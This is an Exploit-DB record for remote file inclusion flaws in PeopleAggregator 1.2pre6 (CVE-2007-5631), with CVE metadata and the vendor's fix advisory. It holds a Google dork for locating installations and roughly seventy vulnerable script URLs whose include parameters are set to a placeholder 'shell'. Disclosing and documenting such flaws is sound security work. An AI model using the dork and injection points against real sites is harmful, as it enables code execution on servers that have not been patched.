ID EDB-ID:4551
Type exploitdb
Reporter GoLd_M
Modified 2007-10-21T00:00:00
Description
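PeopleAggregator <= 1.2pre6-release-53: multiple remote file inclusion (RFI) vulnerabilities, tracked as CVE-2007-5631. Webapps exploit for the PHP platform. Per the vendor advisory, the flaws are exploitable only when PHP's register_globals directive is ON, and they are fixed in v1.2pre6-release-55; turning register_globals OFF or upgrading removes the exposure.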
# PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities
# http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-53.tar.gz
# DORK : "copyright 2006 Broadband Mechanics"
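# POC : each entry below is an affected script plus the request parameter named in CVE-2007-5631 ("shell" stands in for the supplied value).
# Per the vendor advisory these are exploitable only when PHP's register_globals is ON, and v1.2pre6-release-55 fixes them.
# For detection, look in web server logs for requests to these paths that set path_prefix or current_blockmodule_path in the query string.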
# /web/Flickrclient.php?path_prefix=shell
# /web/network_module_selector.php?path_prefix=shell
# /web/submit_abuse.php?path_prefix=shell
# /web/submit_comment.php?path_prefix=shell
# /web/Administration/Includes/configureText.php?path_prefix=shell
# /web/Administration/Includes/contentHome.php?path_prefix=shell
# /web/Administration/Includes/deleteContent.php?path_prefix=shell
# /web/Administration/Includes/deleteUser.php?path_prefix=shell
# /web/Administration/Includes/userHome.php?path_prefix=shell
# /web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=shell
# /web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=shell
# /web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=shell
# /web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=shell
# /web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=shell
# /web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=shell
# /web/BetaBlockModules/EditProfileModule/external.php?path_prefix=shell
# /web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=shell
# /web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=shell
# /web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=shell
# /web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=shell
# /web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=shell
# /web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=shell
# /web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=shell
# /web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=shell
# /web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=shell
# /web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=shell
# /web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=shell
# /web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=shell
# /web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=shell
# /web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=shell
# /web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=shell
# /web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=shell
# /web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=shell
# /web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=shell
# /web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=shell
# /web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=shell
# /web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=shell
# /web/BetaBlockModules//Module/Module.php?path_prefix=shell
# /web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=shell
# /web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=shell
# /web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=shell
# /web/BetaBlockModules/MyNetworksModule.php?path_prefix=shell
# /web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=shell
# /web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=shell
# /web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=shell
# /web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=shell
# /web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=shell
# /web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=shell
# /web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=shell
# /web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=shell
# /web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=shell
# /web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=shell
# /web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=shell
# /web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=shell
# /web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=shell
# /web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=shell
# /web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=shell
# /web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=shell
# /web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=shell
# /web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=shell
# /web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=shell
# /web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=shell
# /web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=shell
# /web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=shell
# /web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=shell
# /web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=shell
# /web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=shell
# /web/includes/blogger.php?path_prefix=shell
# /web/includes/functions/auto_email_notify.php?path_prefix=shell
# /web/includes/functions/html_generate.php?path_prefix=shell
# /web/includes/functions/validations.php?path_prefix=shell
# milw0rm.com [2007-10-21]
{"id": "EDB-ID:4551", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities", "description": "PeopleAggregator <= 1.2pre6-release-53 Multiple RFI Vulnerabilities. CVE-2007-5631. Webapps exploit for php platform", "published": "2007-10-21T00:00:00", "modified": "2007-10-21T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4551/", "reporter": "GoLd_M", "references": [], "cvelist": ["CVE-2007-5631"], "lastseen": "2016-01-31T21:12:32", "viewCount": 5, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-01-31T21:12:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5631"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18391", "SECURITYVULNS:VULN:8329"]}, {"type": "canvas", "idList": ["PEOPLEAGGREGATOR_INCLUDE"]}], "modified": "2016-01-31T21:12:32", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/4551/", "sourceData": "# PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities\n# http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-53.tar.gz\n# DORK : \"copyright 2006 Broadband Mechanics\"\n# POC :\n# /web/Flickrclient.php?path_prefix=shell\n# /web/network_module_selector.php?path_prefix=shell\n# /web/submit_abuse.php?path_prefix=shell\n# /web/submit_comment.php?path_prefix=shell\n# /web/Administration/Includes/configureText.php?path_prefix=shell\n# /web/Administration/Includes/contentHome.php?path_prefix=shell\n# /web/Administration/Includes/deleteContent.php?path_prefix=shell\n# /web/Administration/Includes/deleteUser.php?path_prefix=shell\n# /web/Administration/Includes/userHome.php?path_prefix=shell\n# /web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=shell\n# 
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=shell\n# /web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=shell\n# /web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=shell\n# /web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=shell\n# /web/BetaBlockModules/EditProfileModule/external.php?path_prefix=shell\n# /web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=shell\n# /web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=shell\n# /web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupForumModule/GroupForumModule.php?pa th_prefix=shell\n# /web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=shell\n# /web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=shell\n# /web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=shell\n# /web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=shell\n# /web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=shell\n# /web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=shell\n# /web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=shell\n# /web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=shell\n# 
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=shell\n# /web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=shell\n# /web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=shell\n# /web/BetaBlockModules//Module/Module.php?path_prefix=shell\n# /web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=shell\n# /web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=shell\n# /web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=shell\n# /web/BetaBlockModules/MyNetworksModule.php? path_prefix=shell\n# /web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=shell\n# /web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=shell\n# /web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=shell\n# /web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=shell\n# /web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=shell\n# /web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=shell\n# 
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=shell\n# /web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=shell\n# /web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=shell\n# /web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=shell\n# /web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=shell\n# /web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=shell\n# /web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=shell\n# /web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmo dule_path=shell\n# /web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=shell\n# /web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=shell\n# /web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=shell\n# /web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=shell\n# /web/includes/blogger.php?path_prefix=shell\n# /web/includes/functions/auto_email_notify.php?path_prefix=shell\n# /web/includes/functions/html_generate.php?path_prefix=shell\n# /web/includes/functions/validations.php?path_prefix=shell\n\n# milw0rm.com [2007-10-21]\n", "osvdbidlist": ["45499", "45495", "45498", "45501", "45496", "45497", "45500"]}
{"cve": [{"lastseen": "2020-10-03T11:45:54", "description": "Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the current_blockmodule_path parameter to (1) AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2) ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3) MembersFacewallModule/MembersFacewallModule.php, (4) NewestGroupsModule/NewestGroupsModule.php, (5) UploadMediaModule/UploadMediaModule.php, and (6) VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and (7) the path_prefix parameter to several components.", "edition": 3, "cvss3": {}, "published": "2007-10-23T17:46:00", "title": "CVE-2007-5631", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5631"], "modified": "2018-10-15T21:45:00", "cpe": ["cpe:/a:peopleaggregator:peopleaggregator:1.2pre6"], "id": "CVE-2007-5631", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5631", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:peopleaggregator:peopleaggregator:1.2pre6:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "cvelist": ["CVE-2007-5631"], "description": "Hi all,\r\n\r\nThis is a notification that the remote file inclusion vulnerabilities reported \r\nin CVE-2007-5631 have been fixed in PeopleAggregator v1.2pre6-release-55, and \r\nare 
not exploitable if PHP's register_globals directive is disabled.\r\n\r\nCVE entry: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5631\r\n\r\n-----\r\nMultiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6 \r\nallow remote attackers to execute arbitrary PHP code via a URL in the \r\ncurrent_blockmodule_path parameter to (1) \r\nAudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2) \r\nImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3) \r\nMembersFacewallModule/MembersFacewallModule.php, (4) \r\nNewestGroupsModule/NewestGroupsModule.php, (5) \r\nUploadMediaModule/UploadMediaModule.php, and (6) \r\nVideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and \r\n(7) the path_prefix parameter to several components.\r\n-----\r\n \r\nNotes from vendor: To be exploitable, the web server must be configured with \r\nPHP's register_globals directive ON. To fix a vulnerable installation, either \r\nturn register_globals OFF in php.ini or via the php_flag Apache option, or \r\nupgrade to v1.2pre6-release-55.\r\n\r\nAdvisory blog post: http://www.myelin.co.nz/post/2007/11/12/#200711121\r\n\r\nUpgrade instructions:\r\n\r\n- If installed via Subversion, 'svn update' in the root of your PeopleAggregator \r\ninstall.\r\n\r\n- If installed via tarball, download the latest tarball from \r\nhttp://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-\r\n55.tar.gz and copy all files over those from your existing installation.\r\n\r\nRegards,\r\nPhillip Pearson\r\nBroadband Mechanics", "edition": 1, "modified": "2007-11-12T00:00:00", "published": "2007-11-12T00:00:00", "id": "SECURITYVULNS:DOC:18391", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18391", "title": "PeopleAggregatory security advisory - re CVE-2007-5631", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", 
"cvelist": ["CVE-2007-5631", "CVE-2007-5589", "CVE-2007-5386", "CVE-2007-3694"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.\r\nPHP-Nuke: CAPTCHA protection bypass.", "edition": 1, "modified": "2007-11-12T00:00:00", "published": "2007-11-12T00:00:00", "id": "SECURITYVULNS:VULN:8329", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8329", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5631"], "description": "**Name**| peopleaggregator_include \n---|--- \n**CVE**| CVE-2007-5631 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| peopleaggregator 1.2pre6 remote file include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: peopleaggregator.org \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5631 \nCVE Name: CVE-2007-5631 \n\n", "edition": 2, "modified": "2007-10-23T17:46:00", "published": "2007-10-23T17:46:00", "id": "PEOPLEAGGREGATOR_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/peopleaggregator_include", "type": "canvas", "title": "Immunity Canvas: PEOPLEAGGREGATOR_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}